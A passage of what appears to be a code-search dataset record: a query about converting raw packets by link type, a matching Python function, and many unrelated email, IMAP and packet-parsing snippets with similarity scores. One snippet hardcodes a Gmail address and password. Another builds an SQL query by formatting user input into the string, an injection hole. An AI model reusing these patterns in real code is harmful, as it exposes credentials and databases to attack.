ImgFileName = \"good_boi.png\"\n img_data = open(ImgFileName, 'rb').read()\n msg = MIMEMultipart()\n msg['Subject'] = 'I heard you were feeling down...'\n msg['From'] = 'happybot184@yahoo.com'\n msg['To'] = to\n text = MIMEText(\"So I'm sending you this cute picture to cheer you up!\")\n msg.attach(text)\n image = MIMEImage(img_data, name=os.path.basename(ImgFileName))\n msg.attach(image)\n\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.ehlo()\n s.login('beehappytest1@gmail.com','b33h@ppy')\n s.sendmail('beehappytest1@gmail.com',to,msg.as_string())\n s.quit()\n return True\n except:\n return False\n # gmail_user = 'beehappytest1@gmail.com'\n # gmail_password = 'b33h@ppy'\n #\n # sent_from = gmail_user\n # subject = \"Happy\"\n # body = \"Hey, what's up?\"\n #\n #\n # email_text = \"\"\"\\\n # From: %s\n # To: %s\n # Subject: %s\n #\n # %s\n # \"\"\" % (sent_from, \", \".join(to), subject, body)\n #\n # email_text = \"asdf\"\n #\n # server = smtplib.SMTP('smtp.gmail.com', 587)\n # server.ehlo()\n # server.starttls()\n # server.login(gmail_user, gmail_password)\n # server.sendmail(sent_from, to, email_text)\n # server.close()", "def verifyemail(request,id=None,key=None):\n logging.debug('')\n if settings.EMAIL_VALIDATION == True:\n user = User.objects.get(id=id)\n if user:\n if user.email_key == key:\n user.email_isvalid = True\n clear_email_validation_message(user)\n user.save()\n data = {'action_type': 'validation_complete'}\n return render_to_response(\n 'authenticator/changeemail.html',\n RequestContext(request, data)\n )\n else:\n logging.error('hmm, no user found for email validation message - foul play?')\n raise Http404", "def lookup_email(args):\n db = cache.get_default()\n if args.forced:\n db.lookup_email(args.address)\n try:\n info = db.get_email(args.address, nolookup=args.cached)\n print('{!r:} is {:s}valid: {:s}.'.format(info.address, '' if info.is_valid else 'in',\n info.reason))\n except exceptions.CacheMissException:\n exit('{!r:} is not in the cache.'.format(args.address))", "async def altcheck(self, ctx: Context):\n\t\tauthormsg = ctx.author\n\t\t#authormsg = await self.convertuser(ctx.author.id)\n\t\tif authormsg.id == ownerid:\n\t\t\tpass\n\t\telif authormsg.room_permissions.is_mod or authormsg.room_permissions.is_admin == True:\n\t\t\tpass\n\t\telse:\n\t\t\treturn await self.send(\"You don't have permission to do that.\", whisper=[ctx.author.id])\n\t\tawait self.send(\"This may take a while, be patient.\", whisper=[ctx.author.id])\n\t\tusers = []\n\t\tprint(\"before for loop\")\n\t\tfor user in self.room.users:\n\t\t\tuserdata = await self.returnavinfo(user)\n\t\t\tif userdata['message'] == \"Twitter\":\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif \"Marked as spam\" in userdata['message']:\n\t\t\t\t\tusers.append(userdata['message'])\n\t\t\t\t\tcontinue\n\t\t\t\tdtm = userdata['crdate']\n\t\t\t\trntime = datetime.now()\n\t\t\t\td = datetime.fromisoformat(dtm[:-1])\n\t\t\t\td.strftime('%Y-%m-%d %H:%M:%S.%f')\n\t\t\t\ttimedeltuh = rntime - d\n\t\t\t\tif timedeltuh.days >= 14:\n\t\t\t\t\tappusdata = userdata['message'] + f\"- {timedeltuh} • \"\n\t\t\t\t\tusers.append(appusdata)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\n\t\tprint(\"before lencheck\")\n\t\tuserssend = \"\".join(users)\n\t\tprint(userssend)\n\t\tprint(len(userssend))\n\t\ttry:\n\t\t\tif len(userssend) >= 520:\n\t\t\t\tstrround = round(len(userssend))\n\t\t\t\tstrlen = round(strround) / 2\n\t\t\t\tfirst_half = userssend[:int(strlen)]\n\t\t\t\tsecond_half = userssend[int(strlen):]\n\t\t\t\tawait self.send(first_half, whisper=[ctx.author.id])\n\t\t\t\tawait asyncio.sleep(2)\n\t\t\t\tawait self.send(second_half, whisper=[ctx.author.id])\n\t\t\t\treturn\n\t\t\tprint(\"done\")\n\t\t\tawait self.send(userssend, whisper=[ctx.author.id])\n\t\texcept Exception as e:\n\t\t\tprint(e)", "def is_chat(message):\n labels = message.get('X-Gmail-Labels', \"\").split(',')\n return 'Chat' in labels", "def google_validate(self, token):\n try:\n payload = client.verify_id_token(token, GOOGLE_USER_ID)\n if payload['iss'] not in ['accounts.google.com', 'https://accounts.google.com'] or payload['aud'] != GOOGLE_USER_ID:\n return False\n else:\n return payload\n except crypt.AppIdentityError:\n return False", "def main():\n #Gmail2TelegramClient(\"1234\") -- a person\n #Gmail2TelegramClient(\"-1234\") -- group chat", "def test_parse_message_google_login(self):\n for test_case in self.success_test_google_login:\n expected = test_case[KEY_EXPECTED]\n google_obj = app.on_new_google_user(test_case[KEY_INPUT])\n self.assertEqual(expected, google_obj)", "def is_email_valid(email):\n\n result = requests.get(\n f'https://api.hunter.io/v2/email-verifier?email={email}&api_key={settings.HUNTER_IO_API_KEY}'\n ).json()\n\n return True if result.get('data').get('status') == 'valid' else False", "def search_email_by_all(M):\n print \"basic search mode\\n\"\n rv, data = M.uid('search', None, 'All')\n if check_response(rv):\n return data\n else:\n return None", "def check_users_online(redis_server):\n before_timestamp = int((time.time()) - (ENVIRONMENT['USER_TIMEOUT']))\n\n logging.info(\"checking users online, purging before %s\" % before_timestamp)\n logging.info(\"checking for users before: %s\" % before_timestamp) \n\n expired_users_count = redis_server.zcount(ENVIRONMENT['REDIS_PREFIX'] + \"users_timestamp\",0,before_timestamp)\n logging.info(\"found %d users to expire\" % expired_users_count)\n if expired_users_count > 0:\n expired_users = redis_server.zrange(ENVIRONMENT['REDIS_PREFIX'] + \"users_timestamp\",0, expired_users_count)\n if expired_users != None:\n for key in expired_users:\n channel_name = key.split(':')[0]\n username = key.split(':')[1]\n key = ENVIRONMENT['REDIS_PREFIX'] + \"users:%s\" % username\n data = redis_server.get(key)\n if data != None:\n user = User(**json.loads(data))\n\n msg = ChatMessage(nickname='system', username='system', message=\"%s can not been found in the room\" % user.nickname, channel_name = channel_name);\n \n chat_channel = get_chat_channel(redis_server, channel_name)\n chat_channel.add_chat_message(msg)\n chat_channel.remove_user(user)\n else:\n logging.info(\"unable to find expired user: %s\" % (key))\n\n\n ## setup our next check\n g = Greenlet(check_users_online, redis_server)\n g.start_later(ENVIRONMENT['USER_TIMEOUT_INTERVAL'])", "def get_email_ids(conn, query='ALL'):\n if conn.state != \"SELECTED\":\n raise imaplib.IMAP4.error(\"Cannot search without selecting a folder\")\n\n rv, data = conn.uid('search', None, query)\n if rv != 'OK':\n print (\"Could not fetch email ids\") # for some reason...\n return []\n\n return data[0].split()", "def valid_mx(self, domain):\n try:\n self.nslookup_installed()\n except:\n return True # Valid email as we cant check with nslookup\n\n p = subprocess.Popen(['nslookup', '-query=mx', domain], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n\n try:\n return bool(re.search('mail exchanger', out))\n except:\n # raise Exception(\"Exception in DNS lookup!\" + err)\n return False", "def __validate_email(self,mail):\n if re.match(r\"[\\w\\W]*@+[\\w\\W]*[.]+[\\w]{2,4}\",mail):\n return True\n return False", "def __send_mail(self,username,email):\n try:\n s = smtplib.SMTP(\"smtp.gmail.com\",587)\n s.starttls()\n s.login(vars.email[\"username\"],vars.email[\"password\"])\n otp = random.randint(111111,999999)\n message = MIMEMultipart()\n message[\"From\"] = vars.email[\"username\"]\n message[\"To\"] = email\n message[\"Subject\"] = \"otp\"\n body = MIMEText(\"otp :- \"+str(otp))\n message.attach(body)\n if self.__save_otp(username,otp):\n s.sendmail(vars.email[\"username\"],email,message.as_string())\n s.quit()\n return \"1\"\n else:\n return error(1065)\n except Exception as e:\n print(vars.email)\n print(e)\n return error(1067)", "async def send_email_gmail(self, *, emails: List[EmailStr], username: str, generated_code: str):\n email_content = f\"\"\"\n <html>\n <body>\n <p>Hello {username}, Your email verification code is {generated_code}\n <br>Thanks for using our Todo Application.</p>\n </body>\n </html>\n \"\"\"\n message = email.message.Message()\n message[\"Subject\"] = 'Todo App Authentication'\n message[\"From\"] = EMAIL_ADDR\n\n message.add_header('Content-Type', 'text/html')\n message.set_payload(email_content)\n client = smtplib.SMTP('smtp.gmail.com: 587')\n client.starttls()\n\n # Login Credentials to send the mail.\n client.login(message[\"From\"], EMAIL_PWD)\n\n for user_email in emails:\n client.sendmail(message[\"From\"], user_email, message.as_string())\n print(f\"sending to {user_email}\")", "def fetch_messages_from_imap(host, port, username, password):\n\n with imaplib.IMAP4(host, port=port) as client:\n client.starttls()\n client.login(username, password)\n client.select(\"INBOX\", readonly=False)\n\n client.create(\"Archives\")\n client.create(\"Archives/Crashreport\")\n\n sorted_reply = client.uid(\"SORT\", \"(DATE)\", \"UTF7\", \"ALL\")\n\n if not sorted_reply[0] == \"OK\":\n raise IMAPClientError()\n\n sorted_messages = sorted_reply[1][0].split()\n\n for msg_uid in sorted_messages:\n reply = client.uid(\"FETCH\", msg_uid, \"(RFC822)\")\n\n if reply[0] != \"OK\":\n raise IMAPClientError()\n\n message = email.message_from_bytes(reply[1][0][1])\n\n yield message\n\n # mark message as read and move to archives\n mark_read_reply = client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Seen)\")\n if mark_read_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # moving messages in IMAP unfortunately means copy and delete\n copy_reply = client.uid(\"COPY\", msg_uid, \"Archives/Crashreport\")\n if copy_reply[0] != \"OK\":\n raise IMAPClientError()\n\n delete_reply = client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Deleted)\")\n if delete_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # delete the message immediately\n client.expunge()", "def check_if_online(self, jid):\n return self._roster.check_if_online(jid)", "def check_db(self, email, clean_type=1):\r\n try:\r\n sql = \"\"\"\r\n SELECT * FROM emails WHERE email = '{}' \r\n AND clean_type = {}\r\n AND email_status IN('clean','catch-all')\r\n LIMIT 1\r\n \"\"\".format(email, clean_type)\r\n self.db.cur.execute(sql)\r\n resp = self.db.cur.fetchone()\r\n if resp:\r\n return {EMAIL:resp[EMAIL]}\r\n except:\r\n print(\"sql error: {}\".format(sql))\r\n return None", "def check_new_messages(client_id):\n # Return if driver is not defined or if whatsapp is not logged in.\n # Stop the timer as well\n if client_id not in drivers or not drivers[client_id] or not drivers[client_id].is_logged_in():\n timers[client_id].stop()\n return\n\n # Acquire a lock on thread\n if not acquire_semaphore(client_id, True):\n return\n\n try:\n # Get all unread messages\n res = drivers[client_id].get_unread()\n # Mark all of them as seen\n for message_group in res:\n message_group.chat.send_seen()\n # Release thread lock\n release_semaphore(client_id)\n # If we have new messages, do something with it\n if res:\n print(res)\n except:\n pass\n finally:\n # Release lock anyway, safekeeping\n release_semaphore(client_id)", "def func_from(self, data, get_recv):\n if get_recv:\n checking = bytes(data).decode().encode('ascii', 'ignore').decode()\n else:\n checking = bytes(data).decode().encode('ascii', 'ignore').decode().splitlines()[0]\n data_list = checking.split(':')\n remove_bracket = str(data_list[1])\n remove_bracket = remove_bracket[2:-1]\n data_list[1] = remove_bracket\n check = data_list[0].lower().rstrip()\n if check == 'mail from':\n message = self.conf_th_ic.get_item(q_key='std-messages').get(check)\n self.func_sender(message)\n return True", "def send_mail(Email_id,OTP):\r\n try : \r\n s = smtplib.SMTP('smtp.gmail.com', 587) \r\n s.ehlo()\r\n # start TLS for security \r\n s.starttls() \r\n # Authentication \r\n s.login(mail_id,mail_Password) \r\n message = str(OTP)\r\n # sending the mail \r\n s.sendmail(mail_id, Email_id, message) \r\n # terminating the session \r\n s.quit() \r\n msg=\"Mail has been sent to Registered mail id.\"\r\n except :\r\n msg=\"UserName and Password not accepted kindly provide correct UserName and Password.\"\r\n return msg", "def util_unread(self):\n try:\n query = 'from:scholaralerts-noreply@google.com'\n page_token = None\n p_emails = []\n while True:\n request = self.service.users().messages().list(userId='me',\n q=query, pageToken=page_token)\n response = request.execute()\n if 'messages' not in response:\n break\n p_emails.extend(response['messages'])\n if 'nextPageToken' not in response:\n break\n page_token = response['nextPageToken']\n self.service.users().messages().batchModify(userId='me', body={\n 'addLabelIds': ['UNREAD'],\n 'ids': [e['id'] for e in p_emails]\n }).execute()\n\n except errors.HttpError as error:\n _utils.logger.error(f'An error occurred: ${error}')" ]
[ "0.70329154", "0.6592309", "0.64842856", "0.636004", "0.6350439", "0.62164766", "0.6210396", "0.6174336", "0.60854125", "0.6038846", "0.6019747", "0.5920456", "0.58898234", "0.5836752", "0.5829357", "0.57975626", "0.57911247", "0.57865626", "0.5757906", "0.57237977", "0.56982785", "0.5670466", "0.56280106", "0.5623399", "0.56136477", "0.5565839", "0.55417943", "0.553826", "0.54999584", "0.5481485", "0.5429006", "0.5389988", "0.53681016", "0.5364535", "0.53540266", "0.5330461", "0.5313903", "0.5258311", "0.52553076", "0.5252743", "0.52075857", "0.51776886", "0.51615834", "0.5154399", "0.5138357", "0.51138234", "0.5091792", "0.50535995", "0.50399756", "0.50390303", "0.5038519", "0.5016639", "0.49843732", "0.4983607", "0.49828133", "0.4978663", "0.49657962", "0.49612516", "0.49557328", "0.49492064", "0.4940801", "0.49138585", "0.48754483", "0.4873856", "0.48603466", "0.4846721", "0.48449567", "0.48347035", "0.4825368", "0.48093066", "0.4795183", "0.47891828", "0.4784927", "0.47778073", "0.4772032", "0.47718674", "0.475961", "0.47593617", "0.47564438", "0.47563377", "0.47546855", "0.47462574", "0.47453943", "0.47451496", "0.47358912", "0.47303295", "0.47212172", "0.47112647", "0.4709056", "0.4705263", "0.47026858", "0.47023055", "0.4685047", "0.4673811", "0.46697935", "0.4669071", "0.46455127", "0.4644955", "0.4643078", "0.46269092" ]
0.8364727
0
Converts a raw packet to a dpkt packet regarding of link type.
def iplayer_from_raw(raw, linktype=1): if linktype == 1: # ethernet pkt = dpkt.ethernet.Ethernet(raw) ip = pkt.data elif linktype == 101: # raw ip = dpkt.ip.IP(raw) else: raise Exception("unknown PCAP linktype") return ip
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_packet(linktype, packet):\n link_layer = parse_Ethernet(packet) if linktype == pcapy.DLT_EN10MB else parse_Cooked(packet)\n if link_layer['payload_type'] in ['IPv4', 'IPv6']:\n network_layer = parse_IPv4(link_layer['payload']) if link_layer['payload_type'] == 'IPv4' else parse_IPv6(link_layer['payload'])\n if network_layer['payload_type'] in ['UDP', 'TCP']:\n transport_layer = parse_UDP(network_layer['payload']) if network_layer['payload_type'] == 'UDP' else parse_TCP(network_layer['payload'])\n return (link_layer, network_layer, transport_layer)", "def packetize(cls, source, raw_data):\n pkt = cls(source, raw_data)\n\n if pkt.type not in DGTL.descriptors.keys():\n raise Warning('Unsupported packet type! (%s)' % pkt.type)\n\n pkt.set_decoder(DGTL.descriptors[pkt.type][2])\n\n return pkt", "def flowtuple_from_raw(raw, linktype=1):\n ip = iplayer_from_raw(raw, linktype)\n\n if isinstance(ip, dpkt.ip.IP):\n sip, dip = socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst)\n proto = ip.p\n sport, dport = 0, 0\n l3 = ip.data\n # try to get the layer 3 source and destination port, but its ok if this fails,\n # which will happen when we get IP fragments or packets with invalid checksums\n try:\n sport, dport = l3.sport, l3.dport\n except AttributeError:\n pass\n\n else:\n sip, dip, proto = 0, 0, -1\n sport, dport = 0, 0\n\n flowtuple = (sip, dip, sport, dport, proto)\n return flowtuple", "def payload_from_raw(raw, linktype=1):\n ip = iplayer_from_raw(raw, linktype)\n try: return ip.data.data\n except:\n return \"\"", "def to_network_layer(packet):\r\n print(f\"[to_network_layer] packet:{packet}\")", "def decode(cls, data):\n status = struct.unpack('B', data[1])[0]\n # Power ACK is bit 2\n power_ack = (status & 0x04) >> 2\n # Datarate ACK is bit 1\n datarate_ack = (status & 0x02) >> 1\n # Channelmask ACK is bit 0\n channelmask_ack = status & 0x01\n return LinkADRAns(power_ack, datarate_ack, channelmask_ack)", "def make_packet(self, type, data): \n return (\"{}\\x00{}\\x00{}\".format(type, data, self.ID)).encode()", "def __str__(self):\n return '\\n%(source)s > %(type)s (0x%(type_d).2x)\\n%(data)s' % \\\n {'type': DGTL.pkt_type_str[self.type], 'type_d': self.type,\n 'data': str(self.decoded) if self.decoded else 'Unknown raw data.',\n 'source': self.source}", "def decode(cls, raw: bytes) -> \"EthernetHeader\":\n # unsigned char dmac[6];\n # unsigned char smac[6];\n # uint16_t ethertype;\n # unsigned char payload[];\n dmac = raw[:6]\n smac = raw[6:12]\n typ = socket.htons(struct.unpack(\"H\", raw[12:14])[0])\n payload = raw[14:]\n return EthernetHeader(dmac=dmac, smac=smac, typ=typ, payload=payload)", "def decode(self, eth):\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_ARP:\n\t\t\t# print 'arp'\n\t\t\treturn ARP(eth.data).get()\n\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP6:\n\t\t\tip = eth.data\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# multicast is just like IPv4\n\t\t\t\tif udp.dport == 5353:\n\t\t\t\t\t# print udp\n\t\t\t\t\tans = mDNS(udp).get()\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\t# pp.pprint(ans)\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\treturn ans\n\n\t\t\t\t# print 'IPv6 UDP','port:',udp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# TCP not useful\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\tpass\n\t\t\t\t# tcp = ip.data\n\t\t\t\t# print 'IPv6 TCP','port:',tcp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# ICMP error msg not useful for mapping\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t\t# print 'IPv6 icmp6:',ip.data.data\n\t\t\t\tpass\n\n\t\t\t# other stuff I haven't decoded\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t# print 'IPv6',ip.p,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t\tip = eth.data\n\n\t\t\t# roku interface port: 1900 dst: 239.255.255.250 1900\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# these aren't useful\n\t\t\t\tif udp.dport == 53: # DNS\n\t\t\t\t\t# return DNS(udp.data)\n\t\t\t\t\treturn {}\n\n\t\t\t\telif udp.dport == 5353: # mDNS\n\t\t\t\t\t# print 'mDNS'\n\t\t\t\t\t# print udp\n\t\t\t\t\treturn mDNS(udp).get()\n\n\t\t\t\telif self.getip(ip.dst) == '239.255.255.250':\n\t\t\t\t\treturn {}\n\n\t\t\t\telse:\n\t\t\t\t\t# don't print standard ports\n\t\t\t\t\t# 17500 dropbox\n\t\t\t\t\t# if not ip.data.dport in [17500]:\n\t\t\t\t\t# \tprint 'other udp','port:',udp.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst),': '\n\t\t\t\t\treturn {}\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\t# src = self.getip(ip.src)\n\t\t\t\t# if netaddr.IPAddress(src) not in netaddr.IPNetwork(\"192.168.1.0/24\"):\n\t\t\t\t# \twho = ''\n\t\t\t\t# \tif src not in self.ipMap:\n\t\t\t\t# \t\twho = WhoIs(src).record['NetName']\n\t\t\t\t# \t\tself.ipMap[src] = who\n\t\t\t\t# \telse:\n\t\t\t\t# \t\twho = self.ipMap[src]\n\t\t\t\t# \tif who in ['GOOGLE','AKAMAI','APPLE-WWNET','AMAZO-ZIAD1','DROPBOX']:\n\t\t\t\t# \t\treturn {}\n\t\t\t\t# \telse:\n\t\t\t\t# \t\tprint src,who\n\t\t\t\t# don't print standard ports\n\t\t\t\t# port 58969 - XSANS Apple, why do i see that?\n\t\t\t\t# 22 ssh\n\t\t\t\t# 25 smtp\n\t\t\t\t# 80 http\n\t\t\t\t# 123 time server\n\t\t\t\t# 143 imap\n\t\t\t\t# 443 https\n\t\t\t\t# 445 smb\n\t\t\t\t# 548 afp over tcp\n\t\t\t\t# 5009 airport admin utility\n\t\t\t\t# 5222 ichat\n\t\t\t\t# 17500 dropbox\n\t\t\t\t# if not ip.data.dport in [22,25,80,123,143,443,445,548,5009,5222,17500]:\n\t\t\t\t\t# print 'other tcp','port:',ip.data.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}\n\t\t\t# elif ip.p == dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t# \tprint '?????? other icmp6','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telif ip.p == 2:\n\t\t\t\tpass\n\t\t\t\t# print 'IGMP','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telse:\n\t\t\t\t# print 'other ip packet','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}", "def as_packet(self, ptype):\n return ctypes.cast(self.ptr, ctypes.POINTER(ptype))[0]", "def decode(cls, data):\n if len(data) == 0:\n return None\n cid = struct.unpack('B', data[0])[0]\n if cid == LINKCHECKREQ:\n return LinkCheckReq.decode(data)\n elif cid == LINKADRANS:\n return LinkADRAns.decode(data)\n # TODO\n #elif cid == DUTYCYCLEANS:\n # return DutyCycleReq.decode(data)\n #elif cid == RXPARAMSETUPANS:\n # return RxParamSetupReq.decode(data)\n #elif cid == DEVSTATUSANS:\n # return DevStatusReq.decode(data)\n #elif cid == NEWCHANNELANS:\n # return NewChannelReq.decode(data)\n #elif cid == RXTIMINGSETUPANS:\n # return RxTimingSetupReq.decode(data)\n else:\n return None", "def getRecord(self, rr):\n\t\tif rr.type == 1: return {'type': 'a', 'ipv4': socket.inet_ntoa(rr.rdata), 'hostname': rr.name}\n\t\telif rr.type == 28: return {'type': 'aaaa', 'ipv6': socket.inet_ntop(socket.AF_INET6, rr.rdata), 'hostname': rr.name}\n\t\telif rr.type == 5: return {'type': 'cname', 'hostname': rr.name, 'cname': rr.cname}\n\t\telif rr.type == 13: return {'type': 'hostinfo', 'hostname': rr.name, 'info': rr.rdata}\n\t\telif rr.type == 33: return {'type': 'srv', 'hostname': rr.srvname, 'port': rr.port, 'srv': rr.name.split('.')[-3], 'proto': rr.name.split('.')[-2]}\n\t\telif rr.type == 12: return {'type': 'ptr'}\n\t\telif rr.type == 16: return {'type': 'txt'}\n\t\telif rr.type == 10: return {'type': 'wtf'}", "def gen_broadlink_from_raw(data, repeat=0):\n yield from b'\\x26' # IR\n yield from repeat.to_bytes(1, byteorder='big') # Repeat\n\n # all broadlink ir captures will end with\n # 0x00 0x0d 0x05, which is just a long\n # trailing silence in the command set.\n # On generation we just need to ensure\n # our data ends with silence.\n trailing_silience = -101502.0\n\n def encode_one(x):\n # v = abs(int(i / 32.84))\n v = abs(round(x * 269 / 8192))\n if v > 255:\n yield from b'\\x00'\n yield from v.to_bytes(2, byteorder='big')\n else:\n yield from v.to_bytes(1, byteorder='big')\n\n def encode_list(x):\n for i in raw.paired(raw.simplify(x), trailing_silience):\n yield from encode_one(i)\n\n c = bytearray(encode_list(data))\n count = len(c)\n yield from count.to_bytes(2, byteorder='little')\n yield from c\n\n # calculate total length for padding\n count += 4 # header+len+trailer\n count += 4 # rm.send_data() 4 byte header (not seen here)\n if count % 16:\n yield from bytearray(16 - (count % 16))", "def unwrap(self, packet_raw):\n (self.ip_ihl_ver, self.ip_tos_ecn, self.ip_tot_len, self.ip_id, self.ip_flag_frag, \\\n self.ip_ttl, self.ip_proto) = unpack('!BBHHHBB', packet_raw[0:10])\n (self.ip_check) = unpack('H', packet_raw[10:12])\n (src_addr, dest_addr) = unpack('!4s4s', packet_raw[12:20])\n\n self.ip_ihl = self.ip_ihl_ver & 0x0f\n self.ip_ver = (self.ip_ihl_ver & 0xf0) >> 4\n self.ip_tos = (self.ip_tos_ecn & 0xfc) >> 2\n self.ip_ecn = self.ip_tos_ecn & 0x03\n self.ip_flag_df = (self.ip_flag_frag & 0x40) >> 14\n self.ip_flag_mf = (self.ip_flag_frag & 0x20) >> 13\n self.ip_frag_off = self.ip_flag_frag & 0x1f\n\n self.ip_saddr = socket.inet_ntoa(src_addr)\n self.ip_daddr = socket.inet_ntoa(dest_addr)\n self.data = packet_raw[self.ip_ihl*4:self.ip_tot_len]\n\n pesudo_ip_header = packet_raw[0:10] + pack('H', 0) + packet_raw[12:20]\n new_chksum = network_chksum(pesudo_ip_header)\n if self.ip_check != new_chksum:\n raise ValueError", "def from_network_layer(buffer):\r\n packet = buffer.get_packet()\r\n # print(f'buffer.message:{buffer.message}')\r\n # if packet == None:\r\n # print(f\"[from_network_layer] packet:NULL\")\r\n print(f\"[from_network_layer] packet:{packet}\")\r\n return packet", "def packet_to_str(packet: PacketDescription, simple_diagrams=False, force_show_frames='', show_timestamp=False) \\\n -> PacketDiagramDescription:\n protocol = packet.protocols_str\n note_color = ''\n packet_str = ''\n if 'NGAP' in protocol:\n if nas_req_regex.search(packet.msg_description) is not None:\n note_color = ' {0}'.format(color_nas_req)\n protocol = 'NAS req.'\n else:\n note_color = ' {0}'.format(color_nas_rsp)\n protocol = 'NGAP msg. or NAS rsp.'\n\n # Search NGAP messages\n ngap_matches = ngap_message_type_regex.finditer(packet.msg_description)\n ngap_message_types = [ngap_match.group(1) for ngap_match in ngap_matches if ngap_match is not None]\n if len(ngap_message_types) > 0:\n ngap_seen = set()\n ngap_seen_add = ngap_seen.add\n ngap_message_types = ['NGAP {0}'.format(x) for x in ngap_message_types if\n not (x in ngap_seen or ngap_seen_add(x))]\n\n # Search NAS messages\n nas_matches = nas_message_type_regex.finditer(packet.msg_description)\n nas_message_types = [nas_match.group(1) for nas_match in nas_matches if nas_match is not None]\n if len(nas_message_types) > 0:\n # Remove duplicates: https://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-whilst-preserving-order\n nas_seen = set()\n nas_seen_add = nas_seen.add\n nas_message_types = ['NAS {0}'.format(x) for x in nas_message_types if\n not (x in nas_seen or nas_seen_add(x))]\n\n # Print msg. type\n joint_ngap_nas_msg_types = ngap_message_types + nas_message_types\n if len(joint_ngap_nas_msg_types) > 0:\n protocol = '{0}'.format(',\\\\n'.join(joint_ngap_nas_msg_types))\n\n elif 'HTTP' in protocol:\n # Some customized filtering based on what we have seen\n rsp_match = http_rsp_regex.search(packet.msg_description)\n req_match = http_url_regex.search(packet.msg_description)\n if ('404 page not found' in packet.msg_description) or (rsp_match is not None):\n note_color = ' {0}'.format(color_http2_rsp)\n if rsp_match is not None:\n protocol = '{0} {1} rsp.'.format(protocol, rsp_match.group(1))\n else:\n protocol = protocol + ' 404 rsp.'\n elif req_match is not None:\n note_color = ' {0}'.format(color_http2_req)\n protocol = protocol + ' req.'\n else:\n note_color = ' {0}'.format(color_http2_req)\n protocol = protocol + ' req. or rsp. (no HTTP/2 headers)'\n\n match = list(http_url_regex.finditer(packet.msg_description))\n if len(match) > 0:\n method = ''\n method_match_all = http_method_regex.finditer(packet.msg_description)\n protocols = []\n for idx, method_match in enumerate(method_match_all):\n method = '{0} '.format(method_match.group(1))\n url_split = match[idx].group(1).split('?')\n protocols.append('{0} {1}'.format(method, url_split[0]))\n protocol = '{0}\\\\n'.format(protocol) + '\\\\n'.join(protocols)\n\n elif 'PFCP' in protocol:\n if pfcp_req_regex.search(packet.msg_description) is not None:\n note_color = ' {0}'.format(color_pfcp_req)\n protocol = protocol + ' req.'\n else:\n note_color = ' {0}'.format(color_pfcp_rsp)\n protocol = protocol + ' rsp.'\n\n match = pfcp_message_type_regex.search(packet.msg_description)\n if match is not None:\n protocol = '{0}\\\\n{1}'.format(protocol, match.group(1))\n\n elif 'GTPv2' in protocol:\n if gtpv2_req_regex.search(packet.msg_description) is not None:\n note_color = ' {0}'.format(color_gtpv2_req)\n protocol = protocol + ' req.'\n else:\n note_color = ' {0}'.format(color_gtpv2_rsp)\n protocol = protocol + ' req., rsp. or notification'\n\n match = gtpv2_message_type_regex.search(packet.msg_description)\n if match is not None:\n protocol = '{0}\\\\n{1}'.format(protocol, match.group(1))\n\n elif 'Diameter' in protocol or 'RADIUS' in protocol or \"GTP'\" in protocol:\n note_color = ' {0}'.format(color_diameter_radius_gtpprime)\n protocol = get_diam_description(packet)\n\n if show_timestamp:\n try:\n dt_object = datetime.fromtimestamp(packet.timestamp)\n if dt_object.tzinfo is None:\n tz_str = ''\n else:\n tz_str = ' {0}'.format(dt_object.tzinfo)\n timestamp_hour = ' ({0}:{1}:{2}.{3}{4})'.format(dt_object.hour, dt_object.minute, dt_object.second,\n dt_object.microsecond / 1000, tz_str)\n except:\n timestamp_hour = ''\n protocol = '{0}\\\\n+{1:.3f}s{2}'.format(protocol, packet.timestamp_offsett, timestamp_hour)\n\n frame_number = packet[2]\n packet_str = packet_str + '\"{0}\" -> \"{1}\": {2}, {3}\\n'.format(packet.ip_src, packet.ip_dst, frame_number, protocol)\n packet_str = packet_str + '\\nnote right{0}\\n'.format(note_color)\n\n force_show_frames = [e.strip() for e in force_show_frames.split(',')]\n if simple_diagrams and frame_number not in force_show_frames:\n packet_payload = ''\n else:\n packet_payload = packet.msg_description\n\n if packet_payload != '':\n packet_str = packet_str + '**{0} to {1}**\\n{2}\\n'.format(packet.ip_src, packet.ip_dst, packet_payload)\n else:\n packet_str = packet_str + '**{0} to {1}**\\n'.format(packet.ip_src, packet.ip_dst)\n packet_str = packet_str + 'end note\\n'\n packet_str = packet_str + '\\n'\n return PacketDiagramDescription(packet_str, packet.ip_src, packet.ip_dst, protocol)", "def _parse_packet(packet: StreamMessageResponse) 